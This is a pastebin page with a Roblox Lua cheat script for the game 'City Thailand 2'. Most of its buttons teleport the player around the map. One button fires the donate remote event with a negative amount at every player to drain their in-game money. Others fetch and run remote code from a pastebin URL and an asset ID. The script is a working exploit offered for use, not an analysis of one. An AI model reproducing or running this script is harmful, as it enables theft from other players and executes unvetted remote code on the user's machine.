Facebook
From City Thailand (Update version), 3 Years ago, written in Plain Text.
This paste is a reply to City Thailand 2 from Colorant Water Vole - view diff
Embed
Download Paste or View Raw
Hits: 1311
  1. --Made by PKgamerTH support by Shaw
  2.  
  3. local ScreenGui = Instance.new("ScreenGui")
  4. local main = Instance.new("Frame")
  5. local TextLabel = Instance.new("TextLabel")
  6. local Viproom1 = Instance.new("TextButton")
  7. local Viproom2 = Instance.new("TextButton")
  8. local close = Instance.new("TextButton")
  9. local SpawnLocation = Instance.new("TextButton")
  10. local Goincoolhouse = Instance.new("TextButton")
  11. local Robmoney2 = Instance.new("TextButton")
  12. local Robmoney1 = Instance.new("TextButton")
  13. local Gogetsomegold = Instance.new("TextButton")
  14. local Gotoboomboxsea = Instance.new("TextButton")
  15. local Gotoboomboxfire = Instance.new("TextButton")
  16. local TextButton = Instance.new("TextButton")
  17. local Btools3 = Instance.new("TextButton")
  18. local Stealeveryonemoney = Instance.new("TextButton")
  19. local openmain = Instance.new("Frame")
  20. local open = Instance.new("TextButton")
  21.  
  22. --Properties:
  23.  
  24. ScreenGui.Parent = game.CoreGui
  25. main.Name = "main"
  26. main.Parent = ScreenGui
  27. main.BackgroundColor3 = Color3.fromRGB(74, 74, 74)
  28. main.Position = UDim2.new(0.295707494, 0, 0.0400485694, 0)
  29. main.Size = UDim2.new(0, 514, 0, 283)
  30. main.Visible = false
  31. main.Active = true
  32. main.Draggable = true
  33.  
  34. TextLabel.Parent = main
  35. TextLabel.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  36. TextLabel.Size = UDim2.new(0, 514, 0, 41)
  37. TextLabel.Font = Enum.Font.GothamBlack
  38. TextLabel.Text = "City Thailand 2 (Test)"
  39. TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
  40. TextLabel.TextSize = 14.000
  41.  
  42. Viproom1.Name = "Vip room(1)"
  43. Viproom1.Parent = main
  44. Viproom1.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  45. Viproom1.Position = UDim2.new(0.0175097268, 0, 0.176678449, 0)
  46. Viproom1.Size = UDim2.new(0, 121, 0, 45)
  47. Viproom1.Font = Enum.Font.GothamBlack
  48. Viproom1.Text = "VIP room(1)"
  49. Viproom1.TextColor3 = Color3.fromRGB(0, 0, 0)
  50. Viproom1.TextSize = 14.000
  51. Viproom1.MouseButton1Down:connect(function()
  52. target = game.Players.LocalPlayer:GetMouse() .Hit
  53. x = target.X
  54. y = target.Y
  55. z = target.Z
  56. game.Players.LocalPlayer.Character:MoveTo(Vector3.new(-3.7833161354026,-175.92988586426,288.1722717852))
  57. end)
  58.  
  59. Viproom2.Name = "Vip room(2)"
  60. Viproom2.Parent = main
  61. Viproom2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  62. Viproom2.Position = UDim2.new(0.38132295, 0, 0.176678449, 0)
  63. Viproom2.Size = UDim2.new(0, 121, 0, 45)
  64. Viproom2.Font = Enum.Font.GothamBlack
  65. Viproom2.Text = "VIP room(2)"
  66. Viproom2.TextColor3 = Color3.fromRGB(0, 0, 0)
  67. Viproom2.TextSize = 14.000
  68. Viproom2.MouseButton1Down:connect(function()
  69. target = game.Players.LocalPlayer:GetMouse() .Hit
  70. x = target.X
  71. y = target.Y
  72. z = target.Z
  73. game.Players.LocalPlayer.Character:MoveTo(Vector3.new(11.545143127441,-175.92988586426,317.73217773438))
  74. end)
  75.  
  76. close.Name = "close"
  77. close.Parent = main
  78. close.BackgroundColor3 = Color3.fromRGB(54, 0, 0)
  79. close.BorderColor3 = Color3.fromRGB(20, 32, 40)
  80. close.Position = UDim2.new(0.889105022, 0, 0, 0)
  81. close.Size = UDim2.new(0, 57, 0, 41)
  82. close.Font = Enum.Font.GothamBlack
  83. close.Text = "X"
  84. close.TextColor3 = Color3.fromRGB(255, 0, 0)
  85. close.TextScaled = true
  86. close.TextSize = 14.000
  87. close.TextWrapped = true
  88. close.MouseButton1Down:connect(function()
  89. main.Visible = false
  90. openmain.Visible = true
  91. end)
  92.  
  93. SpawnLocation.Name = "Spawn Location"
  94. SpawnLocation.Parent = main
  95. SpawnLocation.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  96. SpawnLocation.Position = UDim2.new(0.747081757, 0, 0.176678449, 0)
  97. SpawnLocation.Size = UDim2.new(0, 121, 0, 45)
  98. SpawnLocation.Font = Enum.Font.GothamBlack
  99. SpawnLocation.Text = "Spawn Location"
  100. SpawnLocation.TextColor3 = Color3.fromRGB(0, 0, 0)
  101. SpawnLocation.TextSize = 14.000
  102. SpawnLocation.MouseButton1Down:connect(function()
  103. target = game.Players.LocalPlayer:GetMouse() .Hit
  104. x = target.X
  105. y = target.Y
  106. z = target.Z
  107. game.Players.LocalPlayer.Character:MoveTo(Vector3.new(69.852157592773,15.10710144043,305.44198608398))
  108. end)
  109.  
  110. Goincoolhouse.Name = "Go in cool house"
  111. Goincoolhouse.Parent = main
  112. Goincoolhouse.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  113. Goincoolhouse.Position = UDim2.new(0.747081757, 0, 0.402826846, 0)
  114. Goincoolhouse.Size = UDim2.new(0, 121, 0, 45)
  115. Goincoolhouse.Font = Enum.Font.GothamBlack
  116. Goincoolhouse.Text = "Go in cool house"
  117. Goincoolhouse.TextColor3 = Color3.fromRGB(0, 0, 0)
  118. Goincoolhouse.TextSize = 14.000
  119. Goincoolhouse.MouseButton1Down:connect(function()
  120. target = game.Players.LocalPlayer:GetMouse() .Hit
  121. x = target.X
  122. y = target.Y
  123. z = target.Z
  124. game.Players.LocalPlayer.Character:MoveTo(Vector3.new(-108.20418548584,-33.029418945313,-117.61297607422))
  125. end)
  126.  
  127. Robmoney2.Name = "Rob money(2)"
  128. Robmoney2.Parent = main
  129. Robmoney2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  130. Robmoney2.Position = UDim2.new(0.38132301, 0, 0.402826846, 0)
  131. Robmoney2.Size = UDim2.new(0, 121, 0, 45)
  132. Robmoney2.Font = Enum.Font.GothamBlack
  133. Robmoney2.Text = "Rob money(2)"
  134. Robmoney2.TextColor3 = Color3.fromRGB(0, 0, 0)
  135. Robmoney2.TextSize = 14.000
  136. Robmoney2.MouseButton1Down:connect(function()
  137. target = game.Players.LocalPlayer:GetMouse() .Hit
  138. x = target.X
  139. y = target.Y
  140. z = target.Z
  141. game.Players.LocalPlayer.Character:MoveTo(Vector3.new(208.04209899902,-25.820001602173,-552.86242675781))
  142. end)
  143.  
  144. Robmoney1.Name = "Rob money(1)"
  145. Robmoney1.Parent = main
  146. Robmoney1.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  147. Robmoney1.Position = UDim2.new(0.0175097585, 0, 0.402826846, 0)
  148. Robmoney1.Size = UDim2.new(0, 121, 0, 45)
  149. Robmoney1.Font = Enum.Font.GothamBlack
  150. Robmoney1.Text = "Rob money(1)"
  151. Robmoney1.TextColor3 = Color3.fromRGB(0, 0, 0)
  152. Robmoney1.TextSize = 14.000
  153. Robmoney1.MouseButton1Down:connect(function()
  154. target = game.Players.LocalPlayer:GetMouse() .Hit
  155. x = target.X
  156. y = target.Y
  157. z = target.Z
  158. game.Players.LocalPlayer.Character:MoveTo(Vector3.new(-275.18356323242,10.950389862061,-545.58081054688))
  159. end)
  160.  
  161. Gogetsomegold.Name = "Go get some gold"
  162. Gogetsomegold.Parent = main
  163. Gogetsomegold.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  164. Gogetsomegold.Position = UDim2.new(0.747081757, 0, 0.64310956, 0)
  165. Gogetsomegold.Size = UDim2.new(0, 121, 0, 45)
  166. Gogetsomegold.Font = Enum.Font.GothamBlack
  167. Gogetsomegold.Text = "Get some gold"
  168. Gogetsomegold.TextColor3 = Color3.fromRGB(0, 0, 0)
  169. Gogetsomegold.TextSize = 14.000
  170. Gogetsomegold.MouseButton1Down:connect(function()
  171. target = game.Players.LocalPlayer:GetMouse() .Hit
  172. x = target.X
  173. y = target.Y
  174. z = target.Z
  175. game.Players.LocalPlayer.Character:MoveTo(Vector3.new(240.62329101563,-5.7164291641235,140.97622680664))
  176. end)
  177.  
  178. Gotoboomboxsea.Name = "Go to boombox sea"
  179. Gotoboomboxsea.Parent = main
  180. Gotoboomboxsea.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  181. Gotoboomboxsea.Position = UDim2.new(0.38132301, 0, 0.64310956, 0)
  182. Gotoboomboxsea.Size = UDim2.new(0, 121, 0, 45)
  183. Gotoboomboxsea.Font = Enum.Font.GothamBlack
  184. Gotoboomboxsea.Text = "Boombox sea"
  185. Gotoboomboxsea.TextColor3 = Color3.fromRGB(0, 0, 0)
  186. Gotoboomboxsea.TextSize = 14.000
  187. Gotoboomboxsea.MouseButton1Down:connect(function()
  188. target = game.Players.LocalPlayer:GetMouse() .Hit
  189. x = target.X
  190. y = target.Y
  191. z = target.Z
  192. game.Players.LocalPlayer.Character:MoveTo(Vector3.new(330.09317016602,-110.03049468994,-722.61907958984))
  193. end)
  194.  
  195.  
  196. Gotoboomboxfire.Name = "Go to boombox fire"
  197. Gotoboomboxfire.Parent = main
  198. Gotoboomboxfire.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  199. Gotoboomboxfire.Position = UDim2.new(0.0175097585, 0, 0.64310956, 0)
  200. Gotoboomboxfire.Size = UDim2.new(0, 121, 0, 45)
  201. Gotoboomboxfire.Font = Enum.Font.GothamBlack
  202. Gotoboomboxfire.Text = "Boombox fire"
  203. Gotoboomboxfire.TextColor3 = Color3.fromRGB(0, 0, 0)
  204. Gotoboomboxfire.TextSize = 14.000
  205. Gotoboomboxfire.MouseButton1Down:connect(function()
  206. target = game.Players.LocalPlayer:GetMouse() .Hit
  207. x = target.X
  208. y = target.Y
  209. z = target.Z
  210. game.Players.LocalPlayer.Character:MoveTo(Vector3.new(461.59573364258,8.1792335510254,-617.33026123047))
  211. end)
  212.  
  213. TextButton.Name = "ธงชาติและเพลงชาติไทย"
  214. TextButton.Parent = main
  215. TextButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  216. TextButton.Position = UDim2.new(0, 0, 0.876325071, 0)
  217. TextButton.Size = UDim2.new(0, 514, 0, 54)
  218. TextButton.Font = Enum.Font.GothamBlack
  219. TextButton.Text = "ธงชาติและเพลงชาติไทย...(Make everyone hear this song)"
  220. TextButton.TextColor3 = Color3.fromRGB(0, 0, 0)
  221. TextButton.TextScaled = true
  222. TextButton.TextSize = 14.000
  223. TextButton.TextWrapped = true
  224. TextButton.MouseButton1Down:connect(function()
  225. if game.SoundService.RespectFilteringEnabled == false then
  226. for i,v in pairs(game.Workspace:GetDescendants()) do
  227. if v:IsA("Sound") then
  228. v:Play()
  229. end
  230. end
  231. else
  232. loadstring(game:HttpGetAsync("https://pastebin.com/raw/Ts8TSAZN", 0, true))()
  233. notify("Sound is unexploitable.", warn(":("))
  234. end
  235. end)
  236.  
  237. Btools3.Name = "Btools :3"
  238. Btools3.Parent = main
  239. Btools3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  240. Btools3.Position = UDim2.new(1, 0, 0, 0)
  241. Btools3.Size = UDim2.new(0, 44, 0, 302)
  242. Btools3.Font = Enum.Font.GothamBlack
  243. Btools3.Text = "Btools"
  244. Btools3.TextColor3 = Color3.fromRGB(0, 0, 0)
  245. Btools3.TextSize = 14.000
  246. Btools3.MouseButton1Down:connect(function()
  247. loadstring(game:GetObjects("rbxassetid://730927001")[1].Source)()
  248. end)
  249.  
  250. Stealeveryonemoney.Name = "Steal everyone money"
  251. Stealeveryonemoney.Parent = main
  252. Stealeveryonemoney.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  253. Stealeveryonemoney.Position = UDim2.new(-0.0856031179, 0, 0, 0)
  254. Stealeveryonemoney.Size = UDim2.new(0, 44, 0, 302)
  255. Stealeveryonemoney.Font = Enum.Font.GothamBlack
  256. Stealeveryonemoney.Text = "Steal all money"
  257. Stealeveryonemoney.TextColor3 = Color3.fromRGB(0, 0, 0)
  258. Stealeveryonemoney.TextScaled = true
  259. Stealeveryonemoney.TextSize = 18.000
  260. Stealeveryonemoney.TextWrapped = true
  261. Stealeveryonemoney.MouseButton1Down:connect(function()
  262. for _,v in next, game.Players:GetChildren() do
  263.   game.Players.LocalPlayer.PlayerGui.ShopGui.Donate.Client.SendEvent:FireServer(v.Name, "Baht", -1000000000)
  264. end
  265. end)
  266.  
  267. openmain.Name = "openmain"
  268. openmain.Parent = ScreenGui
  269. openmain.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  270. openmain.Position = UDim2.new(0.821939588, 0, 0.777912617, 0)
  271. openmain.Size = UDim2.new(0, 100, 0, 36)
  272. openmain.Active = true
  273. openmain.Draggable = true
  274.  
  275. open.Name = "open"
  276. open.Parent = openmain
  277. open.BackgroundColor3 = Color3.fromRGB(199, 199, 199)
  278. open.Size = UDim2.new(0, 100, 0, 36)
  279. open.Font = Enum.Font.GothamBlack
  280. open.Text = "OPEN"
  281. open.TextColor3 = Color3.fromRGB(0, 0, 0)
  282. open.TextSize = 18.000
  283. open.TextWrapped = true
  284. open.MouseButton1Down:connect(function()
  285. openmain.Visible = false
  286. main.Visible = true
  287. end)

Replies to Re: City Thailand 2 rss

Title Name Language When
Re: Re: City Thailand 2 City Thailand (Update version) text 3 Years ago.